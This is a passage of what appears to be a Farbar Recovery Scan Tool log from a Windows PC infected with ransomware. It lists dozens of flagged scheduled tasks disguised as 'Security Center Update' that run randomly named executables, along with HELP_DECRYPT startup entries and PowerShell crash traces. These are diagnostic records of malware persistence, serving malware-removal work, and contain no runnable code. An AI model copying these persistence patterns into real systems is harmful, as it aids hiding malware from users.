==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0AF68A16-8BB9-4884-9B4E-15D4F360BB7B} - System32\Tasks\Security Center Update - 2036164130 => C:\Users\Dorothy01\AppData\Roaming\Yhohybe\odhie.exe <==== ATTENTION
Task: {0C23B36F-F62C-434F-AA02-5ADBADF1858B} - System32\Tasks\Security Center Update - 2231539794 => C:\Users\Dorothy01\AppData\Roaming\Qaedxa\uwywweo.exe <==== ATTENTION
Task: {10DBF29F-9C03-4CB6-9169-375E42E32964} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\WSCStub.exe [2014-12-06] (Symantec Corporation)
Task: {11313470-E7D3-43C8-A7F7-5F76D072D93D} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {14653784-6568-4765-B81E-19CEB2C29EEF} - System32\Tasks\Security Center Update - 304447838 => C:\Users\Dorothy01\AppData\Roaming\Fyarxy\odrakal.exe <==== ATTENTION
Task: {14B872C9-ED54-4ACC-A2E9-1A45CAD02CCE} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {1DE689D1-D5D6-4E99-9906-A33502FF48FF} - System32\Tasks\Security Center Update - 3156874879 => C:\Users\Dorothy01\AppData\Roaming\Ziqeexew\peisomr.exe <==== ATTENTION
Task: {29FD53A0-B0E0-4AC5-A535-A77BDBAB7300} - System32\Tasks\Security Center Update - 1511213846 => C:\Users\Dorothy01\AppData\Roaming\Ynopqual\epeht.exe <==== ATTENTION
Task: {348D35BE-0530-4438-9C00-FA4E457087F1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-19] (Google Inc.)
Task: {34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87} - System32\Tasks\Security Center Update - 3665910781 => C:\Users\Dorothy01\AppData\Roaming\Ekmiys\edanuzh.exe <==== ATTENTION
Task: {38AD3EE9-89B1-4FE8-BD3A-C268041E30AB} - System32\Tasks\Security Center Update - 3379427597 => C:\Users\Dorothy01\AppData\Roaming\Obmukany\otipky.exe <==== ATTENTION
Task: {45D84C00-2A3B-4698-945A-BD5F046DE8C1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-08-15] (Hewlett-Packard Company)
Task: {46591690-E2C7-4AB5-90B8-0807BF83FA2E} - System32\Tasks\Security Center Update - 1219234967 => C:\Users\Dorothy01\AppData\Roaming\Hovoote\viywyke.exe <==== ATTENTION
Task: {4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC} - System32\Tasks\Security Center Update - 951185298 => C:\Users\Dorothy01\AppData\Roaming\Tumiexcu\esinwii.exe <==== ATTENTION
Task: {506490F7-3376-4EFC-A901-586AA3303B44} - System32\Tasks\Security Center Update - 2325803103 => C:\Users\Dorothy01\AppData\Roaming\Adhoxi\vywipir.exe <==== ATTENTION
Task: {516E887F-D9AA-43E6-A51E-2905BC435DC3} - System32\Tasks\Security Center Update - 1528112639 => C:\Users\Dorothy01\AppData\Roaming\Kuseyd\ihnoxa.exe <==== ATTENTION
Task: {58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A} - System32\Tasks\Security Center Update - 2901739987 => C:\Users\Dorothy01\AppData\Roaming\Icxeewhu\avazx.exe <==== ATTENTION
Task: {62015E40-868F-450C-BB00-4F2987356F87} - System32\Tasks\Security Center Update - 3903236305 => C:\Users\Dorothy01\AppData\Roaming\Itufefv\qusieny.exe <==== ATTENTION
Task: {636CB7B6-8835-4A64-A923-ED55EB0D8640} - System32\Tasks\Security Center Update - 2512843633 => C:\Users\Dorothy01\AppData\Roaming\Ohvyev\yketpyu.exe <==== ATTENTION
Task: {6378A9C8-1406-4725-9242-44BFD048B5CE} - System32\Tasks\Security Center Update - 331106455 => C:\Users\Dorothy01\AppData\Roaming\Ymqiuky\mipiims.exe <==== ATTENTION
Task: {639A2A23-A522-40F7-AD5D-9F1245DF1A82} - System32\Tasks\Security Center Update - 2487970780 => C:\Users\Dorothy01\AppData\Roaming\Pevyliu\adelre.exe <==== ATTENTION
Task: {6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7} - System32\Tasks\rspahma => C:\Users\DOROTH~1\AppData\Local\Temp\utyczdi.exe <==== ATTENTION
Task: {70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54} - System32\Tasks\Security Center Update - 3838766864 => C:\Users\Dorothy01\AppData\Roaming\Ezrydu\xyelefq.exe <==== ATTENTION
Task: {72165FBF-954D-4040-B5B5-BC5F9EED3A0E} - System32\Tasks\Security Center Update - 3216473386 => C:\Users\Dorothy01\AppData\Roaming\Zacosia\geulby.exe <==== ATTENTION
Task: {7430F638-B12A-445A-BBEF-5E8F514DF753} - System32\Tasks\Security Center Update - 699896687 => C:\Users\Dorothy01\AppData\Roaming\Itsefo\zyyzpii.exe <==== ATTENTION
Task: {7444E2A1-12CB-40A5-B56A-3E21543B4514} - System32\Tasks\Security Center Update - 3204526539 => C:\Users\Dorothy01\AppData\Roaming\Huqokayx\cazol.exe <==== ATTENTION
Task: {797B7B84-6E57-4129-A6A9-7A7099782A48} - System32\Tasks\Security Center Update - 242654636 => C:\Users\Dorothy01\AppData\Roaming\Maypyz\acoxv.exe <==== ATTENTION
Task: {7BB4C936-AFE9-405B-8288-876487348757} - System32\Tasks\Security Center Update - 116467704 => C:\Users\Dorothy01\AppData\Roaming\Zekubuab\usloe.exe <==== ATTENTION
Task: {7E32FCE3-C859-49A2-8E75-598B56230006} - System32\Tasks\Security Center Update - 4028262528 => C:\Users\Dorothy01\AppData\Roaming\Byloaq\uzodzay.exe <==== ATTENTION
Task: {833517E7-60C9-4EBA-B5E2-E1A24D86CE1A} - System32\Tasks\Security Center Update - 2519066445 => C:\Users\Dorothy01\AppData\Roaming\Ruyxku\vyfyr.exe <==== ATTENTION
Task: {86BAB3C1-BEB4-4F5B-9723-D319FC15EB44} - System32\Tasks\Security Center Update - 1810362612 => C:\Users\Dorothy01\AppData\Roaming\Senyzayr\ynval.exe <==== ATTENTION
Task: {86C013A6-B536-4DF0-BEDC-656D87A1D6D5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2012-08-07] (Hewlett-Packard Company)
Task: {8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832} - System32\Tasks\Security Center Update - 3747167081 => C:\Users\Dorothy01\AppData\Roaming\Kybeuv\zywefu.exe <==== ATTENTION
Task: {91474FF9-C8FF-4F7E-B671-C5BAA856571C} - System32\Tasks\Security Center Update - 513270047 => C:\Users\Dorothy01\AppData\Roaming\Veepme\mearabi.exe <==== ATTENTION
Task: {9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF} - System32\Tasks\Security Center Update - 4149247359 => C:\Users\Dorothy01\AppData\Roaming\Tapyara\ehubzy.exe <==== ATTENTION
Task: {9BD8C08F-7F0B-430E-AD7D-12988F4D4D76} - System32\Tasks\Security Center Update - 1179286971 => C:\Users\Dorothy01\AppData\Roaming\Ciokov\ekypu.exe <==== ATTENTION
Task: {9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3} - System32\Tasks\Security Center Update - 1285267939 => C:\Users\Dorothy01\AppData\Roaming\Ytbynede\ebusfe.exe <==== ATTENTION
Task: {9DB27102-BD01-4DBA-AA72-192BAC09BFE7} - System32\Tasks\Security Center Update - 3201999599 => C:\Users\Dorothy01\AppData\Roaming\Ihywkead\olypozo.exe <==== ATTENTION
Task: {A24B621A-54AB-4FAF-9C35-FB0D87321DD4} - System32\Tasks\Security Center Update - 1259602875 => C:\Users\Dorothy01\AppData\Roaming\Egewtoi\kumysio.exe <==== ATTENTION
Task: {A31D10D4-B4CF-4475-B02B-0A9BEB4E6617} - System32\Tasks\Security Center Update - 2329648882 => C:\Users\Dorothy01\AppData\Roaming\Ecqootfi\inecimy.exe <==== ATTENTION
Task: {A3FB09EC-C469-45ED-8A04-7E9497A4358B} - System32\Tasks\Security Center Update - 532629427 => C:\Users\Dorothy01\AppData\Roaming\Mawywopo\yhrog.exe <==== ATTENTION
Task: {A589DDED-A1E5-4832-A451-604AADF76C94} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {ACE571AA-4750-4BA4-9AB7-285B651F13E4} - System32\Tasks\Security Center Update - 578871115 => C:\Users\Dorothy01\AppData\Roaming\Wiudiz\areta.exe <==== ATTENTION
Task: {B1AE1850-9814-4733-A837-1BCFDCA93C2F} - System32\Tasks\Security Center Update - 1433702555 => C:\Users\Dorothy01\AppData\Roaming\Olaqduqo\oxico.exe <==== ATTENTION
Task: {B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2} - System32\Tasks\Security Center Update - 2786531556 => C:\Users\Dorothy01\AppData\Roaming\Guhyanmo\usukrau.exe <==== ATTENTION
Task: {B31AB263-6E64-4AE6-9131-F03F3EB11C96} - System32\Tasks\Security Center Update - 2649167008 => C:\Users\Dorothy01\AppData\Roaming\Amcyocut\seovado.exe <==== ATTENTION
Task: {B69D26CC-F736-43EF-8678-4047B1182B5E} - System32\Tasks\Security Center Update - 4109173847 => C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf\ziexepo.exe <==== ATTENTION
Task: {BA2069FF-78E4-45BC-B55E-CD0ACD43F066} - System32\Tasks\Security Center Update - 2002689914 => C:\Users\Dorothy01\AppData\Roaming\Hyipfy\eheqqu.exe <==== ATTENTION
Task: {BB68D13D-D1D6-492F-8D8C-218D8F32F366} - System32\Tasks\Security Center Update - 3566967998 => C:\Users\Dorothy01\AppData\Roaming\Sequefb\apxuyb.exe <==== ATTENTION
Task: {C0214B00-381D-48C6-8657-2096534B77ED} - System32\Tasks\Security Center Update - 2047020247 => C:\Users\Dorothy01\AppData\Roaming\Woakduwa\vyvefiy.exe <==== ATTENTION
Task: {C8F0BD03-484C-4EA4-B730-E73FCF57C579} - System32\Tasks\Security Center Update - 1058146964 => C:\Users\Dorothy01\AppData\Roaming\Esisgyl\hupoto.exe <==== ATTENTION
Task: {CCE07978-A743-41CE-84CE-1E73B09468DB} - System32\Tasks\Security Center Update - 4056442320 => C:\Users\Dorothy01\AppData\Roaming\Ucucni\qyhyg.exe <==== ATTENTION
Task: {D042FFB9-18A6-451E-A0B3-D8F8FDB41F2E} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {D272D6E1-FF48-4D29-8FED-3859A8299DC8} - System32\Tasks\Security Center Update - 446489216 => C:\Users\Dorothy01\AppData\Roaming\Gynika\daboop.exe <==== ATTENTION
Task: {D7DFAC78-DC9A-420F-9905-9654F37432EC} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-02-19] (Google Inc.)
Task: {D8A8741F-AFA1-45BC-8531-65E4136E8CD5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-08-15] (Hewlett-Packard Company)
Task: {DAF472B5-87C9-4EB7-BD1F-23897D28E7CF} - System32\Tasks\Security Center Update - 4131681425 => C:\Users\Dorothy01\AppData\Roaming\Upvukyy\qikoiqp.exe <==== ATTENTION
Task: {DD416C59-DA11-4673-95DF-6CCB71853F43} - System32\Tasks\Security Center Update - 2300971329 => C:\Users\Dorothy01\AppData\Roaming\Fuwutee\kikiap.exe <==== ATTENTION
Task: {F0BDD635-04A8-43FD-B541-D9182F90415D} - System32\Tasks\Security Center Update - 4105554909 => C:\Users\Dorothy01\AppData\Roaming\Wuwuec\xeabac.exe <==== ATTENTION
Task: {F70673BE-9DA6-4FE7-93FB-32DE754FBB81} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2014-09-12] (Microsoft Corporation)
Task: {F9426B1C-C5B8-43C1-9B81-F5F6932587E9} - System32\Tasks\Security Center Update - 700698430 => C:\Users\Dorothy01\AppData\Roaming\Edutsoix\idyzsya.exe <==== ATTENTION
Task: {FA7D302B-25B4-4938-976B-AFD59ED105BC} - System32\Tasks\Security Center Update - 3992158093 => C:\Users\Dorothy01\AppData\Roaming\Onpyym\puzyril.exe <==== ATTENTION
Task: {FDF8C72F-4705-4C83-B0F3-47690D02FCBE} - System32\Tasks\Security Center Update - 4183678770 => C:\Users\Dorothy01\AppData\Roaming\Rifiewyn\puyrdo.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\avast! Emergency Update.job => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) ==============
 
2014-07-04 22:33 - 2014-07-04 22:33 - 00127488 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2012-07-19 19:06 - 2012-07-19 19:06 - 00120224 _____ () c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPItunesModule.dll
2012-07-19 19:06 - 2012-07-19 19:06 - 00048544 _____ () c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPItunesProxy.dll
2012-07-19 19:07 - 2012-07-19 19:07 - 00180224 _____ () c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\zxing.dll
2014-10-14 13:10 - 2014-10-14 13:10 - 00120224 _____ () C:\Users\Dorothy01\AppData\Local\assembly\dl3\N1ZEJ5WT.E21\Y8VKR1P8.4QP\edb32bf5\0038bcf4_1366cd01\HPItunesModule.DLL
2014-07-04 22:33 - 2014-07-04 22:33 - 00102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2012-05-04 17:42 - 2012-05-04 17:42 - 00098304 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\BrandingNet4.dll
2015-02-19 21:17 - 2015-02-19 21:17 - 02911744 _____ () C:\Program Files\AVAST Software\Avast\defs\15021901\algo.dll
2014-07-31 13:16 - 2014-07-31 13:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-07-31 13:16 - 2014-07-31 13:16 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-12-09 18:31 - 2012-05-30 00:51 - 00699280 ____R () C:\PROGRAM FILES (X86)\NORTON INTERNET SECURITY\ENGINE\20.6.0.27\wincfi39.dll
2015-02-19 21:17 - 2015-02-19 21:17 - 38562088 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
 
==================== EXE Association (whitelisted) ===============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\HP\HP_Svinoya_Norway_Sunset.jpg
DNS Servers: Media is not connected to internet.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run32: => "{30112b75-e574-a6db-560c-8103291a0838}"
HKLM\...\StartupApproved\Run32: => "CrashReportSaver"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\StartupFolder: => "HELP_DECRYPT.URL"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\StartupFolder: => "HELP_DECRYPT.TXT"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\StartupFolder: => "HELP_DECRYPT.PNG"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\StartupFolder: => "HELP_DECRYPT.HTML"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\Run: => "acikmao"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\Run: => "BluetoothS"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\Run: => "dccwmote"
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...\StartupApproved\Run: => "Driver Support"
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1427692388-1042374531-2795145444-500 - Administrator - Disabled)
Dorothy01 (S-1-5-21-1427692388-1042374531-2795145444-1001 - Administrator - Enabled) => C:\Users\Dorothy01
Guest (S-1-5-21-1427692388-1042374531-2795145444-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1427692388-1042374531-2795145444-1006 - Limited - Enabled)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/21/2015 10:40:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x033c92b8
Faulting process id: 0x13f4
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:40:48 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(System.Management.Automation.ScriptBlockClauseToInvoke, Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClassa.<InvokeWithPipe>b__8()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, System.Collections.Generic.Dictionary`2<System.String,System.Management.Automation.ScriptBlock>, System.Collections.Generic.List`1<System.Management.Automation.PSVariable>, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (02/21/2015 10:40:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.3.9600.16384, time stamp: 0x52158733
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x033878b0
Faulting process id: 0xf0c
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (02/21/2015 10:40:35 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
